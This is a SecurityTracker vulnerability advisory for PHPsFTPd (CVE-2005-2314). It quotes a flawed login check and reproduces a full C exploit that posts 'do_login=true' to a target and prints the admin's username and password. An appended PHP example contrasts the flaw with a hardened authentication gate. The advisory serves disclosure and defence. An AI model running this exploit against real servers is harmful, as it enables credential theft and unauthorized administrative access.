SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   PHPsFTPd
Vendors:   phpsftpd.sourceforge.net
PHPsFTPd Grants Administrative Access to Remote Users
SecurityTracker Alert ID:  1014481
SecurityTracker URL:  http://securitytracker.com/id/1014481
CVE Reference:   CVE-2005-2314
Updated:  Jun 24 2008
Original Entry Date:  Jul 14 2005
Impact:   User access via network

Version(s): 0.2 - 0.4
Description:   A vulnerability was reported in PHPsFTPd. A remote user can obtain administrative access.

A remote user can submit an HTTP POST request with specially crafted 'do_login' contents to the 'user.php' script to gain access to the application.

Stefan Lochbihler reported this vulnerability.

Impact:   A remote user can obtain administrative access to the target application.
Solution:   No solution was available at the time of this entry.
Vendor URL:  phpsftpd.sourceforge.net/
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHPsFTPd - Admin password leak


Author:             Stefan Lochbihler
Date:               11 July 2005
Affected Software:  PHPsFTPd
Software Version:   0.2 -> 0.4
Software URL:       http://phpsftpd.sourceforge.net/
Attack:             Admin password leak


About PHPsFTPd:
PHPsFTPd is a web based administration and configuration interface
for the SlimFTPd ftp server. It can be used on any http server that
supports PHP and does not need a database or additional php modules,
only SlimFTPd. It allows the administrators of the ftp server to
configure it from within this interface as opposed to its native
ascii conf file. It shows statistics about the users that accessed
the server, the files that were downloaded, server breakdowns etc.


Hi there again,

During a look at the code of the PHPsFTPd project I found out that it
is possible to get the admin's username & password. This happens
when we send a specially crafted POST request to the user.php script.
The reason for the leak is in the inc.login.php script.
When you take a look at the code below you see that the code will exit
if there is no logged session or we don't try to logout.
But when we POST the do_login var with some stuff in it, execution goes on.


Snippet from inc.login.php:


//login form
if (!isset($_SESSION['logged']) && !isset($_GET['do_logout']) &&
    !isset($_POST['do_login'])) {
    echo "<p>&nbsp;</p>
    <form action='index.php' method='post'>
    <img src=gfx/ico_notice.gif align=absmiddle> Please login with admin pass<br>
    <input class=td type='password' name='pass'>
    <input class=button type='submit' name='login' value='Login'>
    </form>
    ";
    die;
}





Exploit:
Prints the admin's username & password



// PHPsFTPd Admin Password Leak
// tested on a WinXP SP1 box



#include "stdafx.h"
#include "stdio.h"
#include "stdlib.h"   /* exit() */
#include "string.h"   /* strncat(), strlen(), memset(), strstr() */
#include "winsock2.h"

#pragma comment (lib,"ws2_32")

#define PORT 80
#define rootdir "/phpsftpd/"


typedef unsigned long ulong;


void usage(char *);
ulong checkhost(char *);



ulong checkhost(char *host)
{
struct hostent *hp;
ulong host_ip=0;

host_ip=inet_addr(host);
if(host_ip==INADDR_NONE){
     hp=gethostbyname(host);
if(!hp){
      printf("unable to resolv host...\n");
	exit(1);
	}

    host_ip= *(ulong*)hp->h_addr;

}

return host_ip;

}


void usage (char *progn){

printf("Usage[%s]: www.targethost.com\n",progn);
exit(0);

}




int main(int argc, char* argv[])
{

    WSADATA wsa;
    SOCKET client;
    WORD wsVersion;

    char httpRequest[1024];
    char recvBuffer[1024];

    char *p;

    struct sockaddr_in addr;
    int err=0,recvSize=0;

    printf("PHPsFTPd Exploit v0.1 (c) by Steve mailto:steve01@chello.at\n");

      if(argc<2)
       usage(argv[0]);
	

wsVersion=MAKEWORD(2,0);

    if(err=WSAStartup(wsVersion,&wsa)){
     printf("Error: WSAStartup\n");
     exit(0);
}


     client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
     if(client==INVALID_SOCKET){
     printf("Error: Create Socket\n");
     exit(0);
}


addr.sin_addr.s_addr = checkhost(argv[1]);
addr.sin_port = htons(PORT);
addr.sin_family = AF_INET;


memset(httpRequest,'\0',sizeof(httpRequest));

strncat(httpRequest,"POST ",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,rootdir,sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"users.php?action=edit&username=root HTTP/1.1\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"User-Agent: PHPSFTPD ACCOUNT MANAGER\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Host: www.targethost.com\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Type: application/x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Length: 13\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"do_login=true\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);

err=connect(client,(SOCKADDR*)&addr,sizeof(addr));

//Get Http Stuff
send(client,httpRequest,strlen(httpRequest),0);
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';
//Get username & password
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';


//shit when anyone use a 0x20 on his password
p=strstr(recvBuffer,"value=");
printf("Username:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);

p=strstr(p,"value=");

printf("\n");
printf("Password:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);
     	
	
closesocket(client);
WSACleanup();

printf("\n");
return 0;
}


Vendor Status: The vendor is informed!

Discovered (c) by Steve
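The gate in inc.login.php quoted above only prints the login form and dies when none of the three conditions (logged session, do_logout, do_login) is set, so a request carrying a do_login value skips the form and the rest of the page, including account data, is rendered. The PHP below is an added illustration, not PHPsFTPd's own code: it places that vulnerable pattern beside a hardened gate in which only a verified session flag grants access and a do_login submission is treated as a login attempt that must pass password verification. The session, request arrays, and the stored admin hash are constructed inputs so it runs from the CLI; the function names are hypothetical.

```php
<?php
// Added example, not from the advisory or the PHPsFTPd project.
// The vulnerable gate is modelled on the inc.login.php snippet in the report;
// the hardened gate is an assumed replacement, not the vendor's fix.

// --- Vulnerable pattern (as described in the report) ---
// Returns true when the page body (admin data included) would be rendered.
// Execution continues whenever do_login is present in the POST body, without
// any password having been verified.
function vulnerable_gate(array $session, array $get, array $post): bool
{
    if (!isset($session['logged']) && !isset($get['do_logout']) && !isset($post['do_login'])) {
        return false; // original code prints the login form and calls die
    }
    return true;
}

// --- Hardened pattern (assumed design) ---
// Only an authenticated session flag grants access. A do_login submission is
// handled explicitly: the password is verified against the stored hash first,
// and the flag is set only on success. do_logout clears the session and denies.
function hardened_gate(array &$session, array $get, array $post, string $admin_hash): bool
{
    if (isset($get['do_logout'])) {
        $session = [];
        return false;
    }
    if (isset($post['do_login'])) {
        $pass = $post['pass'] ?? '';
        if (is_string($pass) && password_verify($pass, $admin_hash)) {
            $session['logged'] = true;
            return true;
        }
        return false; // wrong or missing password: show the login form
    }
    return !empty($session['logged']);
}

// Constructed demonstration data (not from the advisory).
$admin_hash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);

// The crafted request from the report: POST body "do_login=true", no session.
$crafted = ['do_login' => 'true'];

printf("vulnerable gate, crafted POST:         %s\n",
    vulnerable_gate([], [], $crafted) ? 'ACCESS GRANTED' : 'denied');

$session = [];
printf("hardened gate, crafted POST:           %s\n",
    hardened_gate($session, [], $crafted, $admin_hash) ? 'ACCESS GRANTED' : 'denied');

$session = [];
printf("hardened gate, correct password:       %s\n",
    hardened_gate($session, [], ['do_login' => 'true', 'pass' => 'correct horse battery staple'], $admin_hash)
        ? 'ACCESS GRANTED' : 'denied');
printf("hardened gate, follow-up with session: %s\n",
    hardened_gate($session, [], [], $admin_hash) ? 'ACCESS GRANTED' : 'denied');
```

Run with `php gate.php`: the vulnerable gate grants access on the bare do_login request, the hardened gate denies it, and access is granted only after a password that verifies against the stored hash, after which the session flag carries the follow-up request. The general rule the example shows is that the presence of a request parameter must never be one of the conditions that lets a request past an authentication gate; only state the server set after verifying credentials should.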





Copyright 2019, SecurityGlobal.net LLC